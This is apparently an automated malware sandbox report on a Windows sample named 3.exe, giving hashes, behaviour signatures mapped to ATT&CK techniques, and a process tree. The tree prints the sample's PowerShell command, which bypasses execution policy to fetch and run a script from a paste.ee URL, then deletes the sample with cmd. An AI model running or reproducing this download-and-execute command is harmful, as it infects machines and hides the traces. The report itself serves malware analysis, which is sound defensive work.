Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2024 16:16
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
2.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
2.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
3.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
3.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
4.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
4.exe
Resource
win10v2004-20240802-en
General
-
Target
3.exe
-
Size
1.2MB
-
MD5
6f58eada2611d4e69798d3824ab1ed28
-
SHA1
76f0495c12cb7884fc406b1ef7de946230a1f499
-
SHA256
0a7fded88420aedebccb96a4cacd197d5b29b60746e8c3a423cb0f78f3674f5c
-
SHA512
a32df7e7cb123ab1f9d4649e8c6b5b039346de1879398c5a68e6ca5d7d8c5a408e8b2ac72d68c46ca7ad9660ca08a9503ba31f7817b954f056a26fe5fb1b4f5d
-
SSDEEP
24576:Qrfl+F1DI+oc6owGiOV8DABNUS+m+++oJee++oAYLbmtjjjjDjjpmbiDcA:6t+F1DI+96iiOaDkNUS+m+++oJee++oC
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 14 4324 powershell.exe 17 4324 powershell.exe 24 4324 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
3.exepowershell.execmd.exewhoami.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
3.exepowershell.exepid process 1300 3.exe 1300 3.exe 1300 3.exe 1300 3.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
powershell.exewhoami.exedescription pid process Token: SeDebugPrivilege 4324 powershell.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe Token: SeDebugPrivilege 5068 whoami.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
3.exepowershell.exedescription pid process target process PID 1300 wrote to memory of 4324 1300 3.exe powershell.exe PID 1300 wrote to memory of 4324 1300 3.exe powershell.exe PID 1300 wrote to memory of 4324 1300 3.exe powershell.exe PID 1300 wrote to memory of 2612 1300 3.exe cmd.exe PID 1300 wrote to memory of 2612 1300 3.exe cmd.exe PID 1300 wrote to memory of 2612 1300 3.exe cmd.exe PID 4324 wrote to memory of 5068 4324 powershell.exe whoami.exe PID 4324 wrote to memory of 5068 4324 powershell.exe whoami.exe PID 4324 wrote to memory of 5068 4324 powershell.exe whoami.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups /fo csv3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5068 -
C:\Windows\SysWOW64\cmd.execmd.exe /c del /f /q "C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82